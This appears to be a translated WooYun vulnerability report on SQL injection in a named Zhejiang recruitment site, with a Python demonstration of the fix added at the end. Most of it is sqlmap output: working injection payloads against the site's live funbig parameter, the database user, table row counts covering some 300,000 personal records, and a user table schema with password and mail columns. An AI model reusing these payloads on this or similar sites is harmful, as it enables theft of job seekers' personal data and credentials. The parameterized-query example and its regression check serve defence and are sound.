
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0143903

Title: SQL injection in a Zhejiang job-recruitment site (leaks 300K personal records, plus accounts, passwords, emails, etc.)

Vendor: a Zhejiang job-recruitment website

Author: 路人甲

Submitted: 2015-09-28 16:16

Fix time: 2015-11-12 16:18

Disclosed: 2015-11-12 16:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 13

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-28: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-12: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection in a Zhejiang job-recruitment site (leaks 300K personal records, plus accounts, passwords, emails, etc.)

Detailed description:

Found nearly 1.6 million records + 300K personal records + internal staff accounts + corporate email accounts and passwords, including Tencent and 163 mailboxes.... pretty slick....
Database: jobhost
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| job_accessing | 1619907 |
| job_person_logs | 320695 |
| job_person | 307885 |
Link: http://m.125job.com/hangye/index?funbig=2174

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: funbig
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: funbig=2174) AND 1687=1687 AND (7297=7297
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: funbig=2174) AND (SELECT 4546 FROM(SELECT COUNT(*),CONCAT(0x3a7861613a,(SELECT (CASE WHEN (4546=4546) THEN 1 ELSE 0 END)),0x3a6861773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7841=7841
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: funbig=2174); SELECT SLEEP(5);--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: funbig=2174) AND SLEEP(5) AND (3890=3890
---
[15:18:59] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[15:18:59] [INFO] testing if current user is DBA
[15:18:59] [INFO] fetching current user
[15:18:59] [WARNING] reflective value(s) found and filtering out
[15:18:59] [INFO] retrieved: 125job2@localhost
available databases [2]:
[*] information_schema
[*] jobhost
database management system users [1]:
[*] '125job2'@'localhost'
database management system users privileges:
[*] '125job2'@'localhost' [1]:
privilege: USAGE
Database: jobhost
[137 tables]

Proof of vulnerability:

Database: jobhost
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| job_accessing | 1619907 |
| job_person_logs | 320695 |
| job_person | 307885 |
| job_person_manager_merge | 306848 |
| job_person_basis | 292682 |
| job_person_intention | 286649 |
| job_corporation_giveuplog | 276996 |
| job_person_ability | 253661 |
| job_corporation_logins | 206672 |
| job_com_viseted | 204679 |
| job_talent | 204406 |
| duo_sms_log | 185680 |
| duo_jobs_visited | 152808 |
| job_statistics | 147773 |
| huodong_turntable | 130973 |
| job_apprise | 103574 |
| job_corporation_manager | 100503 |
| job_person_work | 85957 |
| job_corporation_groups | 79777 |
| job_corporation | 71855 |
| job_corporation_jobs | 71760 |
| job_corporation_basis | 71592 |
| job_oa_corporation | 67143 |
| job_person_edu | 64781 |
| job_giveuplog | 47832 |
| duo_job_corporation_ok | 47802 |
| job_person_garner | 46512 |
| job_news | 46036 |
| job_search | 34030 |
| job_person_integral_log | 33681 |
| person_integral | 27776 |
| duo_qqapi | 22842 |
| job_corporation_sale | 18922 |
| job_corporation_visited | 17577 |
| job_pinyin_keywords | 13501 |
| job_person_pugong | 13124 |
| job_person_letter | 11259 |
| job_person_card | 9999 |
Database: jobhost
Table: job_person
[34 columns]
+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| chang_time | int(8) |
| chang_time_en | int(8) |
| click | int(4) |
| datasource | int(1) |
| en_integrated | int(2) |
| en_status | tinyint(3) |
| have_en_resume | smallint(1) |
| id | int(12) |
| integrated | int(2) |
| lock | smallint(1) |
| log_count | int(4) |
| log_ip | varchar(32) |
| log_time | int(8) |
| mail | varchar(127) |
| mailsendtime | int(10) |
| managerid | int(14) |
| myscore | int(11) |
| myweight | int(11) |
| password | varchar(32) |
| person_virtuosity | smallint(1) |
| person_virtuosity_show | smallint(1) |
| person_virtuosity_time | int(8) |
| photo | varchar(127) |
| photo_show | smallint(1) |
| post_basis | smallint(1) |
| post_intention | smallint(1) |
| recommend_time | int(8) |
| reg_time | int(8) |
| secrecy | smallint(1) |
| secrecy_corporation | varchar(127) |
| user | varchar(32) |
| userid | int(12) |
| webtype | tinyint(3) |
| webuser | varchar(50) |
+------------------------+--------------+
Database: jobhost
Table: job_person_manager_merge
[42 columns]
Database: jobhost
Table: job_person
[31 entries]

Fix recommendation:

Filtering...
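To make the one-word fix concrete, here is an added example that is not part of the original report or the site's code: the broken pattern the sqlmap payloads above rely on (the raw `funbig` value is pasted into a parenthesised WHERE clause, which is why every payload starts with `)` and ends by reopening one) next to a version that validates the numeric parameter and binds it, plus a regression check that replays the report's boolean-blind pair against both. The real site runs PHP 5.2 on MySQL; this models it in Python with an in-memory SQLite table, and the table name, columns and rows are constructed assumptions.

```python
import sqlite3

# Constructed sample data modelling the listing lookup behind
# /hangye/index?funbig=...; the table, columns and rows are assumptions.
SAMPLE_ROWS = [
    (1, 2174, "Sales manager"),
    (2, 2174, "Account executive"),
    (3, 3000, "PHP developer"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jobs (id INTEGER, funbig INTEGER, title TEXT)")
    conn.executemany("INSERT INTO jobs VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def jobs_vulnerable(conn, funbig):
    """Broken pattern: the GET value is interpolated as SQL text inside a
    parenthesised WHERE clause, so "2174) AND 1=1 AND (1=1" parses fine."""
    sql = "SELECT id, title FROM jobs WHERE (funbig = %s) ORDER BY id" % funbig
    return conn.execute(sql).fetchall()


def jobs_fixed(conn, funbig):
    """Hardened form: reject anything that is not a plain non-negative
    integer, then bind it as a parameter so it can never become SQL."""
    if not isinstance(funbig, str) or not funbig.isdigit():
        raise ValueError("funbig must be a non-negative integer")
    sql = "SELECT id, title FROM jobs WHERE (funbig = ?) ORDER BY id"
    return conn.execute(sql, (int(funbig),)).fetchall()


def is_rejected(conn, query_fn, value):
    """True when the handler refuses the value before it reaches the DB."""
    try:
        query_fn(conn, value)
    except ValueError:
        return True
    return False


def boolean_blind_differential(conn, query_fn, param):
    """Regression check using the report's own payload pair: a true and a
    false tautology appended to the same value. A handler is injectable if
    the true case matches the baseline while the false case differs."""
    true_case = f"{param}) AND 1687=1687 AND (7297=7297"
    false_case = f"{param}) AND 1687=1688 AND (7297=7297"
    if is_rejected(conn, query_fn, true_case):
        return False  # input validation stops the probe entirely
    base = query_fn(conn, param)
    return base == query_fn(conn, true_case) and base != query_fn(conn, false_case)
```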

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.